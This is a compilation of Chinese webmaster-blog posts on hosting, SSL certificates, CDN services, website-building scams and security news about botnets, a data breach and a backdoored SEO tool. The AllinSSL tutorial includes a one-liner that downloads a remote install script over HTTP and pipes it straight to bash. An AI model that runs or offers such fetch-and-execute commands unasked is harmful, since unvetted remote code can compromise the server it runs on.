已经有站长把网站URL替换成小程序后,网站收录消失的情况了。 百度小程序的内容审核确实严,你的内容不能出现QQ电话微信等联系方式,联系方式只能单独做一个页面才可以,一但有内容不合格就需要整改,如果不整改小程序就会下线。 对于主机吧博客来说内容倒是没什么关系,但是受不了的是收录小程序页面后,你小程序是无法打广告的,相当于免费提供内容给百度了,自己连打个广告都无法做到,那有什么意思呢? 还有个问题是,开启百度小程序后,百度小程序的蜘蛛抓取是非常变态的,主机吧一个4核8G的12M云服务器都经常被小程序占满,简直离谱,如果是抓取网站页面我倒欢迎,问题是他抓取的全是小程序的页面,那就没啥用了。 最后,做网站的真的不建议给网站再弄一个百度小程序,简直多此一举,而且百度小程序真的没有流量。 #### 做网站被建站公司坑的那些事情你需要了解下 需要做网站的朋友往往是一些对网站建设一点都不懂的企业老板,很多甚至都不懂什么是域名什么是服务器。往往一些不靠谱的建站公司看到这些老板都是像看到肥羊,可以任意坑对方的钱。要么报价格高得离谱,要么给你弄个垃圾网站,主机吧虽然不是建站公司,但也常年遇到一些被建站公司坑的客户,今天主机吧在这里细数这些年遇到建站公司坑人事情,希望可以帮到大家。事件1这是在我一个开塑料公司的朋友那得来的经验, 我一朋友刚开公司什么都不懂就想建个网站做推广。当时找了家本地公司,报价两年2万元,相当于每年1万,服务内容帮做一个网站,并帮推广,保证关键词排名前十。这样一看,感觉挺划算,但其实是被坑得很惨,首先一个企业网站建设根本不需要多少钱,包括空间域名费用一年顶死也就二三千块,除去域名空间成本,建站公司怎么也收入2000块吧,而对方却报价1万一年,这个价格有点离谱,而对方保证的关键词前十,其实挺能忽悠,因为我朋友塑胶行业其实在本地推广关键词几乎没有人做推广,竞争力非常少,只要网站被百度收录几乎都可以排前三页,稍微做点外链,几个月就排前十了,这些根本不需要怎么推广。事件2最近有一购买百度云加速CDN的客户反馈网站经常打不开。后来主机吧了解到原来这个客户当时建站的时候被建站公司坑了,给他用自助建站的程序建的,什么是自助建站呢?比如凡科建站那种就是自助建站。这种建站是不需要改什么程序,操作简单。但缺陷就是完全没有自主性,你的网站会跟几百上千个站同一个服务器,享用同一个程序。一但同一个服务器的某一个网站被攻击了,你也会访问不了,而且你还不能分离出来。而且这种自助建站的服务器更新经常换IP,严重影响了你的网站SEO。事件3之前一个购买主机吧虚拟主机的客户,然后突然说他的网站原来好好的,现在却登不上后台了。后来才发现原来建站公司给他弄的是需要授权的网站后台。而这个客户已经一年多没有交费了,授权过了自然打不开。事件4主机吧有一个企业客户手上几十个企业站,全部都是采用织梦程序,而且还是老版本的织梦程序建的,然后突然有一天那几十个站全都被挂马了,经查询发现是使用的织梦程序漏洞导致被人入侵的。而客户联系上网站建设的,网站建设公司根本不懂得怎么处理这类漏洞。从以上三件事情,我们应该得出经验:1 找别人建站一定要货比三家,了解行情后再找对方公司建设,最好找一个懂行的人咨询,以免被坑;2 一定不要用自助建站程序建设网站,要独立自主的程序,网站要可以备份到其它服务器安装的,这个需要跟建站公司说清楚;3 网站开发的内核最好是开源程序,比如wordrpess、dedecms这类程序,而不是那些需要授权的程序,那些需要授权的程序往往都是有后门的,一但你没交钱,网站就用不了。这个也需要跟建站公司说清楚;4 网站程序选用一定要选用安全可靠的最新版程序,并且建站公司要有能力对漏洞进行处理,否则被挂马一切都白忙好了,好了以上就是主机吧对这些年遇到的被建站公司坑的客户得来的经验。希望可以帮到大家,有什么问题的可以给主机吧。 #### 做网站还是做自媒体?截至3月百度百家号创作者数达到420万 5月19日消息:百度发布了2021年一季度财报,据财报显示,一季度,百度营收281.34亿元,同比增长25%,市场预期272.69亿元;非公认会计准则下归母净利润42.97亿元,同比增长39%。百度预计下季营收将介于人民币297亿元(45亿美元)至人民币325亿元(50亿美元)之间,同比增长14%至25%。该指引未计及收购YY直播的潜在贡献。 一季度,百度核心收入为人民币205亿元(31.3亿美元),同比增长34%。在线营销收入为人民币163亿元(24.8亿美元),同比增长27%。非营销收入为人民币42亿元(6.46亿美元), 同比增长70%,主要受云服务等推动。爱奇艺收入为人民币80亿元(12.2亿美元),同比增长4%。 财报还显示,2021年3月,百度App月活用户达到5.58亿,日登录用户占比超过75%,两项指标均实现环比增长。截至3月,百家号创作者数达到420万,同比增长40%;智能小程序月活跃用户数达4.16亿,智能小程序数量同比增长74%。托管页收入占百度核心在线营销服务收入的比重从去年的21%进一步提升至35%。 很显然,百家号群体已经在逐步扩大,由于百度号在百度搜索中的地位,以后独立网站处境将越来越难了。 #### 做英文网站,如何选择域名和服务器? 创建英文网站时,选择域名和服务器是两个关键步骤,它们对网站的可访问性、用户体验和搜索引擎优化都有重要影响。以下是一些基本的指导原则: 选择域名(Domain Name) 简洁易记:选择一个简短、易于拼写和记忆的域名。 相关性:域名应该与网站内容或品牌相关,这样用户一看就知道网站的主题。 使用关键词:如果可能,将关键词包含在域名中,有助于SEO(搜索引擎优化)。 顶级域名(TLD):对于英文网站,.com 是最常见和最受欢迎的选择,但.net、.org、.info 等其他TLD也可以根据网站的性质选择。 检查域名的可用性:使用域名注册商的搜索工具检查你想要注册的域名是否可用。 品牌保护:考虑注册不同TLD和相似拼写的域名,以保护你的品牌不受侵犯。 选择服务器(Web Hosting) 地理位置:选择一个地理位置靠近你的目标受众的服务器,以减少加载时间。 性能:确保服务器提供足够的带宽、存储空间和处理能力来支持你的网站流量和内容。 可靠性:选择一个有良好正常运行时间记录的服务器,以确保你的网站始终在线。 安全性:选择提供SSL证书和定期备份的服务器,以保护你的网站和用户数据。 扩展性:选择一个可以随着你网站增长而扩展资源的服务器。 技术支持:选择一个提供24/7客户支持的服务器,以便在遇到问题时能够快速解决。 价格:比较不同服务器提供商的价格和套餐,选择性价比高的选项。 控制面板:选择一个提供用户友好控制面板的服务器,如cPanel或Plesk,以便轻松管理网站。 其他考虑因素 SEO:确保域名和服务器选择符合SEO最佳实践。 移动优化:随着移动设备的普及,选择一个支持移动优化的服务器和设计响应式网站的域名至关重要。 用户体验:快速的加载速度和稳定的服务器可以显著提高用户体验。 最后,不要忘记在选择了域名和服务器之后,还需要进行域名的DNS设置,将域名指向服务器的IP地址,以便用户能够通过域名访问你的网站。 #### 做跨境网络赌博的小心啦!今年3月1日起跨境赌博写进刑法 今年3月1日,《中华人民共和国刑法修正案(十一)》将正式施行,跨境赌博首次写进刑法,这意味着今后,国家将从严从重打击跨境赌博。 网络博彩每年除了大量国内资金外流外,更重要的是给国内的社会造成了恶劣的影响,东南亚骗子们的猖狂、贪婪,也严重挑战中国警方的权威。 为了严打网络跨境赌博,中国政府花了很大力气,制定了很多严打政策。 2021年开始,就新出台了好几个严打的政策。 2月5日,最高人民法院、最高人民检察院和公安部联合制定了《关于敦促跨境赌博相关犯罪嫌疑人投案自首的通告》正式发布。 这是为了严厉打击跨境赌博犯罪行为,同时贯彻落实宽严相济的刑事政策,给涉赌犯罪嫌疑人改过自新、争取宽大处理的机会, 在2021年的1月底,文化和旅游部表示:一些境外城市仍存在吸引中国游客出境赌博的情况,将于近期会同有关部门采取第二批旅游目的地“黑名单”举措,对中国公民前往“黑名单”中的境外城市和景区采取相关旅游限制措施。 2021年1月10日至11日,第十五次全国检察工作会议上表示,会同最高法院、公安部发布指导意见,从严从重打击跨境赌博。 网赌与诈骗因暴利的驱使,这些年从越发的疯狂。大家都在国外紧盯着中国这一庞大的赌客市场,因此呈现包围中国状态分布。 国家从一开始无视上升到现在党中央高度重视,准备动用全国的力量严打。 但是,从事网投及诈骗的人也不是省油的灯,他们高度敏感、极度聪明…… 国家一次次的会议,一次次的行动,大家虽然日子也有些困难,有人还是在努力的掘金着,也已经有不少人金盆洗手,主动回国避风头。 目前,在国内也出现了不少,因在境外从事网络赌博,回国后被警方直接逮捕。 #### 偷走你隐私数据的网络服务提供商将罚款百万元 像很多行业一样,大数据产业在原始积累阶段,同样穿插着黑灰产的影子,不少靠盗用隐私数据牟利。不过近日,根据《网络安全法》后续明文规定:涉嫌用户隐私数据违法获取、出售的网络服务提供商,或将面临百万罚款。 (截取的两项重要条款) 这份文件被视为去年出台的《网络安全法》的后续和实操细则,即 公安部制定的《公安机关互联网安全监督检查规定(征求意见稿)》。 也主要针对一些黑灰产通过黑进企业网络、跟企业内鬼勾结挪出数据、入侵手机Root权限、以及最简单粗暴的,翻找收货人的网购快递单……非法获取用户个人数据。 尽管去年网信办为了规范用户数据隐私,集中约谈了十几家大数据公司,和一批互联网企业。但是未来如何构建隐私和保护个人数据,仍有待解决。 #### 僵尸网络 CatDDoS 向思科 / 华为等厂商发起攻击 安全公司奇安信近日发布报告,声称僵尸网络 CatDDoS 在过去三个月内出现大量活动迹象,相关黑客据称利用超过 80 个已知漏洞针对各种厂商的网络设备进行攻击,攻击高峰时一天内据称有超过 300 台设备受到影响。 黑客利用的漏洞类型非常广泛,波及美国、中国、法国、德国、巴西等国家地区的云服务提供商及教育学术机构,主要针对思科、华为、网件、瑞昱、希捷、腾达、TP-Link、中兴等厂商的网络设备进行攻击。 据悉,CatDDoS 僵尸网络是“Mirai”衍生变种,相关病毒最早在去年 8 月出现,在 12 月短暂停止活动,但如今又卷土重来,同时还新增了更多变种。 值得一题的是,安全公司报告称黑客使用了大量未确定的零日漏洞进行攻击,除了厂商的网络设备外,据称许多平台近日也遭受相关黑客攻击,涉及 GitLab、Jenkins、Metabase、Log4j、RocketMQ 等服务器。 #### 僵尸网络平台Anyproxy 5Socks 被查封,四名跨国嫌犯被起诉 当地时间 5 月 9 日,美国司法部发布公告,披露其与荷兰国家警察携手开展了一场代号为 “登月行动” 的跨国执法行动,成功查封了两大僵尸网络服务。 此次大规模执法行动并非单打独斗,而是由美国联邦调查局、荷兰国家警察局、美国俄克拉荷马州北区检察官办公室与美国司法部多方协同推进。在行动取得阶段性成果后,美国司法部进一步宣布,已对四名嫌疑人提起诉讼,其中包括三名俄罗斯人和一名哈萨克斯坦人。美国司法部指控,这些嫌疑人利用全球数千台老旧路由器组建僵尸网络,借此非法获利超过 4600 万美元(按当前汇率换算,约合 3.33 亿元人民币)。 起诉书详细揭示了此次案件的关键信息。自 2004 年便开始运营的 Anyproxy 与 5Socks,表面伪装成提供合法服务的平台,实际上却暗中利用漏洞,入侵存在安全缺陷的无线路由器。它们将劫持的设备整合,构建起庞大的僵尸网络,使得网络犯罪产生的流量在技术处理下,均显示为被控设备的住宅 IP 地址,以此掩盖犯罪源头,增加追踪难度。 网络安全领域的专业机构也对此次事件予以关注。网络安全公司 Lumen 旗下的 Black Lotus Labs 研究员 Ryan English 指出,Anyproxy 和 5Socks 这两个平台已沦为网络犯罪的帮凶,被广泛用于密码喷洒攻击、分布式拒绝服务(DDoS)攻击以及广告欺诈等恶意活动。根据该实验室发布的报告,涉案僵尸网络每周平均有 1000 余个节点处于活跃状态,其 “黑手” 更是伸向全球 80 余个国家和地区。Ryan English 及其同事基于大量研究和分析,笃定 Anyproxy 和 5Socks 本质上是 “由同一运营商运营的相同代理池”,只不过采用了不同名称来混淆视听 。此次美荷联合执法行动,不仅对相关僵尸网络进行了打击,也向国际网络犯罪行为释放出强烈的警示信号。 #### 光缆被挖断导致腾讯云dnspod官网均出现无法登陆状态 7月24日消息,腾讯云官网出现大范围故障,各地无法登陆帐户。 据主机吧了解到,原来是腾讯云的广州电信运营商物理光缆被挖断了,包括腾讯云主页、控制台、DNSPod等均无法访问。 最近各大云服务器均出现重大故障,先是阿里云bug功能导致故障,然后又到谷歌一样bug功能故障,现在再到腾讯云光缆断故障,大家一起出事的节奏哈。   #### 免费CDN彻底总结,奇安信360网站卫士也要下线了! 运营了近十年之久的免费CDN360网站卫士要走到了尽头,就在今天,360网站卫士发公告称将于2024年6月30日停止服务。 前有百度云加速关停,后到360网站卫士停止运营,不得不感慨免费互联网时间过去了。 目前各大厂商都有对应的高防CDN服务,不过价格都比较高,比如阿里云,一但受到攻击,一个月没几千几万下不来,腾讯云也出了一个EO安全CDN,主机吧曾经给客户接入过,结果一没设置好,15分钟直接欠费500多块,吓得赶紧停了。而现在好用便宜的高防CDN已经不多了,百度云加速也经过一年多的挣扎目前已经全面迁移百度智能云管理了,目前主机吧的客户也基础从百度云加速迁移至百度智能云的云防护套餐,相比之前,云防护价格贵了不少,不过总体上还是很有性价比,有需要的同学,可以看下。 详细地址:https://www.yunjiasu.cc/shangdian/81.html #### 免费ssl和收费ssl证书有什么区别? 现在SSL越来越普及了,主机吧博客5年前就已经部署了SSL,部署了SSL的网站可以防御网站传输信息被监听,对web浏览器到服务器之间传输的信息进行加密,包括手机号,银行卡,账号和密码等信息。 目前市面上有免费SSL和收费SSL证书,今天我们来说下免费SSL和收费SSL有什么区别: 1、SSL证书类型 免费SSL证书:一般为域名型DV SSL证书,仅用于提供基本级别的身份验证,常用于小型网站和博客等平台。免费SSL证书没有组织验证(OV)和扩展验证(EV)证书的类型。 收费SSL证书:则有OV和EV类型的SSL证书,这对于保护商业网站是绝对必要的。 2、验证级别 免费SSL证书:仅需基本级别的身份验证,CA机构不会验证除网站所有者身份之外的任何内容。 收费SSL证书:OV/EV SSL证书除了必须验证网站所有者的身份之外,还需要对公司和业务进行深入的验证。 3、有效期 免费SSL证书:一般CA机构提供的免费SSL证书有效期为三个月至一年。因此,站长需有效期满前重新申请SSL证书并部署安装。 付费SSL证书:使用年限为一年。 4、服务支持 免费SSL证书:只能绑定单个域名、不支持通配符域名、多域名等。由用户自行安装,无法提供后期服务和技术支持,在遇到SSL证书安装问题时,也无法得到解决。 收费SSL证书:一般会提供申请购买到安装的一系列访问,后续出现问题,还找提供商寻求解决。 5、信任程度 免费SSL证书:仅地址栏显示HTTPS和安全锁图标。 收费SSL证书:除了显示HTTPS和安全锁图标,还能查询到公司详细信息,EV SSL证书还能使地址栏变成绿色,并在地址栏直接展示公司名称。 一些免费SSL证书由于非法信息泛滥,还可能不受浏览器信任,所以选择收费SSL证书还是非常必要的。 #### 免费SSL证书Let's Encrypt 创始人去世 做网站的同学都知道,Let's Encrypt 是一个流行的证书颁发机构(CA),可免费颁发DV域名证书和泛域名证书,虽然有效期只有短短的三个月,但是却解决了很多站长买不起SSL证书的困境,全球有两亿的网站使用Let's Encrypt的免费服务。 全球知名企业都是Let's Encrypt的赞助商 昨日,年仅 43 岁的 Let's Encrypt 的创始人之一 Peter Eckersley 在旧金山的 CPMC Davies 医院去世。 网站显示,Peter 是 EFF 对 Let's Encrypt 和 ACME 贡献的领导者,在这几年中,这些技术从一个疯狂的想法变成了互联网基础设施的重要组成部分。他还在将 EFF、Mozilla 和密歇根大学的团队合并为一个团队和一个项目方面采取了很多举措。他后来在互联网安全研究小组的初始董事会任职。 Peter 来自澳大利亚墨尔本,是一名狂热的公路自行车手和浓缩咖啡鉴赏家,以其华丽的时尚感、对美丽建筑的欣赏以及举办派对和召集人群的才能而闻名。他拥有墨尔本大学的博士学位。 Peter 的学术兴趣包括经济学和道德哲学,他在这些领域进行了积极的研究,包括证明人类价值可能无法系统化,从而可以就每种情况下什么是最好的给出清晰一致的答案。在 Giving What We Can 承诺的创始成员中,Peter 承诺将其收入的 10% 捐赠给慈善机构。 在他生命的尽头,Peter 将他的职业生涯集中在人工智能的道德和安全上,他创立了人工智能目标研究所,以研究他看到的经济体中可能出现的令人惊讶和不受欢迎的结果与可能出现的结果之间的具体相似之处。 #### 免费SSL证书要进入收费倒计时了 最近主机吧的一个域名SSL证书到期了,想着申请一个免费的SSL得了,结果发现腾讯云的免费SSL证书开始限制申请了。 自2023年3月21日起,个人账号可申请50张免费证书,其中30张需使用腾讯云域名申请;企业可申请10张免费证书,均需使用腾讯云域名申请。 主机吧查看了下百度智能云也有这个问题: 单个用户ID最多支持申请20张免费DV型证书,超过配额请199元/年购买或选择其他付费证书。 看来,免费的SSL证书开始缩紧了,要慢慢开始收费的节奏,主机吧看了下,目前市面上最便宜的收费SSL证书,一年也要几十块,价格赶上域名的价格了,这样网站建设的成本越来越高了哈。 #### 免费商用字体OPPO Sans和下载地址 11月20日,OPPO在北京正式发布了全新的手机系统ColorOS 7。 ColorOS 7 主打无边界设计理念,OPPO在重新设计UI设计的同时,宣布OPPO Sans字体正式版也将在ColorOS 7中正式上线,整套字体包含了22万个字符。 令人震惊的是,还给设计师带来了一个重磅福音,那就是宣布将OPPO Sans字体免费授权给全社会使用(包括商用)! 这是一次真正的开放授权,不论是个人还是企业,均可下载免费使用。真所谓喜大普奔呀! 据了解,这款字体中文部分由汉仪字库字体设计总监朱志伟指导,黄珍元设计完成,西文部分则由美国 Pentagram 五角公司设计,汉仪字库西文项目组负责人张暄协作完成。 OPPO 品牌字体紧随品牌升级步调,用文字全方位探索科技美感,用独特语言打造具有标志性的、与众不同的全新品牌体验。 OPPO Sans 采用了全新骨架,中宫自然舒适,结构稳定,字形舒展,强化了屏幕显示的易读性和美观性。 视觉重心的提高,让整体造型看起来挺拔优雅,充满生命力。 “简洁真实”是 OPPO 追诉的品牌美学,简化笔画,在提高屏幕显示的阅读体验的同时,也能够释放 OPPO 现代化科技美感。 把握更多的细节处理,例如去除出脚,让 OPPO Sans 看起来更加简洁、干净。 此次开放的 OPPO Sans,是继阿里巴巴普惠体后,又一款授权全社会免费使用的字体,包含226003个字符,5个家族Light / Regular / Medium / Bold / Heavy 。 那么问题来了,这样一款免费好看的字体去哪里下载? 你可以通过以下 3 种方式获取: 下载渠道1:ColorOS 官网(https://www.coloros.com/topic/coloros7.html) 进入后再多滑动几次,找到“下载 OPPO Sans ”并点击: 就可以将字体包下载到电脑端啦: #### 免费图库要变收费了?Unsplash被 Getty Images 收购 3月31日消息(刘文轩)总部位于加拿大的 Unsplash 是有名的免费图库网站,网站中的图片来自用户上传,提供所有人免费下载,并用于商业及非商业用途,无需任何许可。过去,Unsplash 一直通过捐款和广告收益维持营运,但最终仍未摆脱被商业公司收购的命运。 如今,Unsplash 宣布被 Getty Images(盖帝图像)收购,后者是一家诞生于1995年的图片交易公司,它与视觉中国成立的华盖创意专门负责它的中国业务。 Unsplash 在一篇新闻稿中开门见山地表示,这笔交易不会使 Unsplash 关停,它将作为 Getty Images 的独立品牌和部门继续运营。整个团队将保留下来,按“一直以来的方向”打造 Unsplash。 Unsplash 称,它将获得 Getty Images 的“资源和经验”,帮助自己加快建立“世界上最有用”的视觉资源库计划。 Unsplash 表示,他们曾在2016年首次接触 Getty Images 团队,但当时并不确定后者会“以与我们相同的方式看待这个世界”,经过多年的沟通,Unsplash 了解到 Getty Images 对它的尊重程度,以及创作者的权利,得出结论:“很明显,我们对世界的看法也很相似。” 对于未来,Unsplash 表示,平台中图片的下载量刚刚突破30亿次,Unsplash for Brands 的规模增加了三倍,最近还推出了Unsplash Hire。在与 Getty Images 的合作中,Unsplash 打算加快这些方面的计划,与品牌进行更多合作,并为创意人才创造更多机会。Unsplash 表示将扩大招聘和资源,加速发展。 Unsplash 最初是一个 Tumblr 博客,创始人 Mikael Cho 直到2013年才把它打造成独立的网站。Unsplash 的图片均已 CC0协议授权,访问者可以免费获取平台上的图片,免费进行商业或非商业使用,作为一个社区,上传者也需要遵循图片完全免费提供的原则。 Unsplash被Getty Images收购的事情对国内自媒体与站长来说,肯定是非常不利的,被商业公司收购意为着图片极可能商业化,未来会不会产生侵权风波不得而知,要知道视觉中国的爪子是非常长的。 #### 免费图片素材网站Freepik 因SQL注入漏洞安全漏洞 830万用户数据遭泄露 8月24日 消息:Freepik可以说是互联网上最受欢迎的网站之一,不少用户通过该网站获取高质量免费照片和设计素材。 不过,Freepik日前披露了一起重大安全漏洞称,一名黑客(或多名黑客)利用SQL注入漏洞访问其一个存储用户数据的数据库,并获得了其Freepik和Flaticon网站上最老的 830 万注册用户的用户名和密码。 Freepik官方并没有说明漏洞发生的时间,也没有说明它是何时发现的。不过,该公司表示,在得知这一事件后,立即通知了有关部门,并开始调查这一漏洞以及清点黑客获取的内容。 Freepik方面强调,黑客并未窃取了所有用户的账户都有相关的密码,只取走了部分用户的信息。 其中有 450 万用户由于使用第三方(包括谷歌、Facebook或Twitter)联合登录,攻击者可以获得的数据只有电子邮件,并不存在哈希密码。另外,还有 377 万用户的邮件地址和密码哈希值已经被黑客获取。目前,Freepik已经将所有用户密码加密方式更新为Bcrypt。 该公司表示,现在正在根据被采取的措施,用定制的电子邮件通知所有受影响的用户。这些邮件将发给Freepik和Flaticon用户,这取决于用户在什么服务上注册过。 #### 免费开源三维图形图像软件 Blender 3.1 正式版发布:支持 M1 / Pro / Max / Ultra Mac 的 Metal GPU 渲染 流行的开源 3D 软件 Blender 刚刚更新到 3.1 版本,这次更新带来了重要的改进。Blender 3.1 现在具有 Metal GPU 渲染功能,适用于搭载 M1 系列芯片的 Mac。 早在 2021 年 12 月,Blender 发布了支持 Metal 的 Blender 3.1 测试版,现在所有用户都可以使用该更新。自从苹果在 macOS 中终止对 OpenCL 技术支持,转而支持 Metal 以来,Blender 从未提供在 Mac 上启用 GPU 渲染的选项。 现在有了 Metal 后端,该应用不仅可以通过访问 GPU 而运行得更快,而且还可以与 M1、M1 Pro、M1 Max 和 M1 Ultra 芯片内置的 GPU 一起工作。如 Blender 网站所示,与标准 CPU 渲染相比,使用 Metal GPU 渲染的时间最多减少一半。 另外,Blender 3.1 使用的内存更少,光线追踪的精度也得到了提高,asset 浏览器库现在有了索引,可以更快地加载,而且该应用还获得了 19 个新节点。 用户可以在 Blender 官方网站上查看所有的新功能并下载 Blender 3.1 软件。值得注意的是,Metal GPU 渲染只适用于 Apple Silicon 芯片和 AMD 显卡,而且它需要运行 macOS Monterey 12.3 或更高版本的 Mac。 #### 免费开源:自动续签SSL证书管理平台 互联网安全已迈入“秒签 + 秒续”的时代,SSL 证书的有效期正从“年/月”压缩至“天”,频繁手动续签令人头疼。 本文将深入介绍 AllinSSL — 一个永久免费、开源的 SSL 全生命周期管理平台。帮你彻底告别续期焦虑,轻松实现“证书永久免费 + 自动更新”。 为什么“永久免费”不只是噱头? 开源驱动,社区力量强大:AllinSSL 在 GitHub 上已有 2.2k+⭐,完全开源、支持自托管,真正做到永久免费使用。Github地址:https://github.com/allinssl/allinssl 官网地址:https://allinssl.com 多 CA 全覆盖:支持 Let’s Encrypt、ZeroSSL、Google Trust Services、SSL.com、BuyPass 等主流免费 acme 证书颁发机构(CA),还可自定义 CA,真正实现自由选择,无平台锁定。 自动续签,不限次数:内建定时任务,一次配置,永久无忧。支持自动续签后无缝部署至各类环境,如自建服务器(Nginx,Apache)、宝塔面板、1P、CDN/WAF/对象存储等多平台,且支持通过插件的形式扩展平台支持。 实战操作:从安装→申请→自动部署 下面通过具体部署演示,实现面板证书的自动化管理: 1. All in SSL支持多种部署方式,如脚本部署,Docker,宝塔面板一键部署等,大家可根据需要自行选择(以下三种方式任选其一即可): 脚本部署(推荐): SSH登录服务器,执行以下命令: curl -sSO http://download.allinssl.com/install_allinssl.sh && bash install_allinssl.sh allinssl 海外服务器请使用以下命令: curl -sSO https://cnb.cool/allinssl/install.sh/-/git/raw/main/install_allinssl.sh && bash install_allinssl.sh allinssl 安装完成会提示以下登录信息,请安装提示放通云厂商的服务器或安全组后访问外网IPv4面板地址登陆(如放通端口后无法打开,可执行allinssl 3重启): Docker等更多安装方式可查看:https://allinssl.com/guide/getting-started.html 2. 部署完成后进入AllinSSL界面,点击授权API管理,添加授权API。(本文以域名在腾讯云注册解析为例,并部署到宝塔面板和腾讯云CDN,如您需要部署到其他位置或域名在其他厂商,可根据需要切换) 添加宝塔面板API打开宝塔面板,点击设置,在常用设置中找到API接口点击API接口设置,开启API接口,重置密钥(如果密钥不可见),并配置IP白名单,若 AllinSSL 与宝塔面板部署在同一台服务器上,白名单可填写 127.0.0.1;如分布在不同服务器,请填写对应的公网 IP,或视情况使用 *(不推荐)。 将API密钥,面板地址(http/https://ip+端口)填入ALLinSSL,并确认保存。 添加完成后可以在页面点击测试验证API是否添加正确。 添加腾讯云API 前往腾讯云新建密钥https://console.cloud.tencent.com/cam/capi 创建完成后填写到AllinSSL保存 添加完成后点击测试测试API是否正常完成后我们即可开始创建工作流,进行证书的自动部署与续签 3. 点击自动化部署,并添加自动化部署 4. 选择快速部署模板 5. 点击申请证书 设置需要申请证书的邮箱和域名,点击保存 6. 点击部署,设置需要部署的服务,此处因为需要部署到宝塔面板的网站,因此选择宝塔面板-网站 选择需要部署的网站名,其他默认即可,设置完成后提交 如需同时部署到腾讯云CDN(或其他服务商)可向下添加部署分支或并行分支,按页面提示填写即可,此处不再另外演示。 7. 最后可配置通知任务接收部署任务状态通知,添加前请前往设置页面配置具体的通知渠道,如果不需要通知,可直接删除后续流程。 8. 全部配置完成后点击保存即可 9. 保存后建议点击执行手动执行验证工作流是否正常,确认执行成功。 10. 前往宝塔面板即可看到已经部署的证书。 11. 访问测试,可以看到证书已经正常部署 实战操作:网站证书监控自动化续签与部署并非终点。实时、精准的监控才是确保“永久免费+自动更新”真正落地的核心保障。AllinSSL 提供了多维度的监控能力,让证书状态尽在掌握。PS:当前监控功能正在升级,改版后将支持更多协议类型,并引入更灵活的通知规则配置,预计本周内正式上线。敬请期待! 1. 打开监控页面 2. 点击添加监控,并输入要监控的域名(可以自定义端口,不填写的话默认443),选择通知渠道。 3. 点击确认添加,添加后即可看到证书状态,如出现异常,会通过配置的通知渠道发送告警通知。 AllinSSL 以“永久免费 + 完全开源”为核心理念,通过自动化流水线实现 SSL 证书的申请 - 自动续期 - 无缝部署 - 实时监控全流程闭环,真正解决 SSL 运维的最后一公里问题。 立即上手 AllinSSL:开启证书管理新时代: Github地址:https://github.com/allinssl/allinssl 官网地址:https://allinssl.com #### 免费快排软件藏后门可远程控制服务器,多人中招! 前几天,4414站长论坛,一个黑客分享了一个自称是免费快排的软件,很多人下载,包括主机吧也下载了。不过主机吧看到杀毒软件提示有病毒的时候,就没有安装。 还好没有安装,这几天被论坛上的安全大佬实锤软件藏了后门,可远程控制电脑服务器,很多人已经中招了。 目前来看,中招的人肯定不少,目前这个所谓的雷电SEO官网已经打不开了。 大家网上别乱下载东西哈,很多软件都是藏后门的,轻的让你服务器卡死,严重的数据丢失,甚至财务被窃。 以下是论坛上某大佬的技术分析贴: https://www.4414.cn/thread-111708-1-1.html https://www.4414.cn/thread-111822-1-1.html #### 免费把网站打包成pwa应用包上传至微软应用中心 最近不是国内APP需要备案才可以上架APP应用中心嘛,但是网站本来有备案的就不需要,完全可以打包成PWA应用当APP使,而微软就有一个不错的网站,可以免费帮网站打包成PWA应用,同时上传微软应用中心。 将 PWA 发布到 Microsoft Store 可将其扩展到全球数百万 Windows 用户。 此步骤可将 PWA 从 Web 体验转换为 Microsoft Store 生态系统中的可发现应用程序。 只需单击一下,用户即可安装你的应用,通过 Microsoft Store 享受更新,并在其设备上像本机应用一样体验它。 通过按照指南来保留应用名称、打包 PWA 并提交应用,你将能够向更广泛的受众展示应用程序,并确保实现无缝的用户体验。 打包适用于 Microsoft Store 的 PWA PWABuilder 网站可为 Microsoft Store 打包 PWA。 打包 PWA 涉及将必要的文件和元数据捆绑为 Microsoft Store 识别的格式,以支持用户无缝安装和使用你的应用。 保留应用程序名称 要创建正确的 PWA 包,首先需要在 Microsoft 合作伙伴中心保留应用程序名称。 合作伙伴中心是一个平台,可帮助你管理应用程序并将其部署到 Microsoft 的店面。 通过保留名称,还可以获取 PWABuilder 打包过程的包信息,以提交到 Microsoft Store。 下面是保留名称的步骤: 登录到“合作伙伴中心仪表板”。 导航到“应用和游戏”部分。 选择“+ 新产品”按钮,然后选择“应用”。 此时将会显示为应用程序提交保留名称的提示。 输入应用名称。 保留应用名称后,可以访问包信息。 导航到“产品标识”部分,并记下页面右侧的三个产品标识值。 第一个值是包 ID。 第二个值是发布者 ID。 最后一个值为发布者显示名称。 复制并保存三个值。 需要全部三个值才能使用 PWABuilder 打包应用。 打包应用 在将 PWA 提交到 Microsoft Store 之前,需要使用 PWABuilder 创建正确的包。 导航到 PWABuilder.com。 在主页上输入 PWA 的 URL,然后选择“开始”。 选择“适用于 Microsoft Store 的包”以导航到“包选择”页。 选择左上角“Windows”下面的“生成包”。 此时会显示“打包选项”提示符。 输入在保留应用名称时保存的三个产品标识值。 选择“下载包”。 提交发布 PWA 的请求 设置应用程序以便用户可以通过 Microsoft Store 访问的最后一步是通过合作伙伴中心提交 PWA。 此过程涉及上传打包的 PWA 并提供有关应用的必要详细信息。 提交 PWA 并获得批准后,用户可直接从 Microsoft Store 下载和安装,以提高应用程序的可见性和影响力。 请参阅以下步骤,以通过合作伙伴中心提交 PWA: 导航到合作伙伴中心仪表板中的“应用和游戏”部分。 从应用列表中选择之前创建的列表。 在下一页上选择“开始提交”按钮。 必须完成每个部分才能将 PWA 发布到 Microsoft Store,但现在请选择“包”部分。 将从 PWABuilder 下载的 .msixbundle 和 .classic.appxbundle 包合并到提交中。 请拖放它们或使用文件浏览器选项将它们插入到“包”部分。 选择“保存”。 成功将包与提交关联后,需要添加有关应用的更多详细信息。 例如,显示在 Microsoft Store 上的应用标题、说明、类别、关键字和屏幕截图。 查看并添加详细信息后,选择“提交到 Microsoft Store”以启动 PWA 的评审过程。 PWA 评审和发布 提交 PWA 后,会检查其功能、性能和策略符合性。 审查过程通常需要 24 到 48 小时。 批准后,应用将在 Microsoft Store 上可用。 如果应用未通过,你将在重新提交之前收到有关要解决的问题的反馈。 #### 免费时代结束了!百度云加速不再支持免费版了! 今天有站长向主机吧反馈,百度云加速添加不了域名了,添加显示不支持创建免费域名。 主机吧特地去问了下官方客服,得到的答案大吃一惊,免费版取消了。 后续只有收费版了,已经接入的免费版并不影响,不过不要删除域名了,删除后再想重新添加,就得买收费版了。 其实百度云加速取消免费版是早有征兆的,去年开始百度云加速就开始迁移至百度智能云了,百度智能云大家懂的,没有免费的东西,所以百度云加速要完全迁移至百度智能云,免费版肯定会取消了的。 